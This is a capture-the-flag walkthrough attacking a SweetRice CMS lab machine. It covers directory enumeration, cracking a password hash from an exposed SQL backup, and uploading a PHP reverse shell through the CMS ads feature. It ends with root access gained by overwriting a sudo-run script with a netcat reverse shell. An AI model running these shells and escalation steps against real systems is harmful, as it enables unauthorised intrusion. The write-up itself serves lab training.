[Enumeration]
- Port Scan
nmap -Pn <ip>There’re 2 ports: 22 and 80.
2. OS and services scan
nmap -A -p 22,80 <ip>
3. Access HTTP site
Nothing much.
View page source, nothing much.
4. Scan directory with gobuster.
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<ip>/ -x php,txt,html,sh,cgiThere’s a “/content” directory.
5. Access “/content”
It’s CMS SweetRice. Noting much here.
View page source. Noting much.
Inspect element, there’s cookie named “sweetrice”.
6. Further enumeration in “/content”.
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.10.94.163/content/ -x php,txt,html,sh,cgi
Access “/images/”
Access “/license.txt”
Access “/js/”
Access “/changelog.txt”
It’s version 1.5.0
Access “/inc”
There’re interesting file and directories: cache, lastest.txt, and mysql_backup.
Access “/inc/cache/”
There’s file named “cache.db”.
Download it
wget http://<ip>/content/inc/cache/cache.db
Read the file
cat cache.dbNot much useful.
Access “/inc/lastest.txt”
Seems like this CMS is 1.5.1. Now, there’re 2 possibility of version number: 1.5.0 and 1.5.1.
Access “/inc/mysql_backup”
There’s file.
Download it.
wget http://10.10.94.163/content/inc/mysql_backup/mysql_bakup_20191129023059-1.5.1.sql
Read the file.
I have to adjust the lines in file for easier viewing.
Seems like there’re some credentials.
Let’s crack the md5 hash with crackstation.
It’s Password123.
My guess:
admin: Password123manager: Password123
Access “/as”
Now I found admin panel.
Let’s login with guessed credentials.
admin:Password123Failed!!!
Try another one
manager:Password123Success!!!
Let’s continue directory enumeration
Access “/_themes” , there’s “default” directory.
Access “/_themes/default/”, nothing much
Access “/attachment”, nothing much
[Exploitation]
- Search for exploits
searchsploit sweetriceThere’s code execution.
2. Copy and read
searchsploit -m 40700
Read the file.
Seems like I have to access admin panel -> Ads section
This seems like the result of an exploit.
3. Test the exploit
Back to admin panel -> Ads section. This section may be exploited following the exploit document/script.
Let’s change the IP and path in the code first.
Copy and paste the code. Click done.
Nothing happens. Seems like I need Ads name.
Let’s read the code again. The underlined strings “hacked” may be connected.
Try to add the code again, this time I will input Ads name as “hacked”.
Success!!!
I edit the path in the code to remind myself.
Let’s access “/content/inc”. There’s new directory, “ads”.
There’s a file, “hacked.php”.
Access it. Seems like the exploit is successful.
4. Get reverse shell
Create listener
nc -lvp 1234
Create php reverse shell
<?phpexec("/bin/bash -c 'bash -i >& /dev/tcp/<ip>/1234 0>&1'");?>
Copy and paste it in the code. I also change the value to be “shell”.
Let’s create the exploit file in admin panel.
Now I have shell file in “/content/inc/ads”.
Access it.
Now I have reverse shell.
5. Let’s explore the machine
idI’m www-data.
cd /homels cd itguylscat user.txt
cat mysql_login.txt
cat backup.plIt’s perl script and call “/sh”.
[Privilege Escalation]
- Verify sudo rights.
sudo -l
Since “backup.pl” call “sh” to have a shell and I can run perl with sudo privilege. Maybe I can have root access with both of them.
sudo /usr/bin/perl /home/itguy/backup.pl
Failed. The machine is crashed. I have to stop the shell and redo the step of getting reverse shell again.
Let’s give another try.
This time I have to read it more clearly.
cat backup.plThere’s “/etc/copy.sh”.
Read it
cat /etc/copy.shIt’s a reverse shell to some machine.
Prepare the command by copying it, change IP and port number.
Replace the old script
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> 1236 >/tmp/f" > /etc/copy.sh
Verify the script
cat /etc/copy.sh
2. Let’s exploit
Create another listener
nc -lvp 1236
Run the command
sudo /usr/bin/perl /home/itguy/backup.pl
Back to reverse shell, I have to wait a while til I get the shell.
idNow I’m root.
cd /rootlscat root.txt
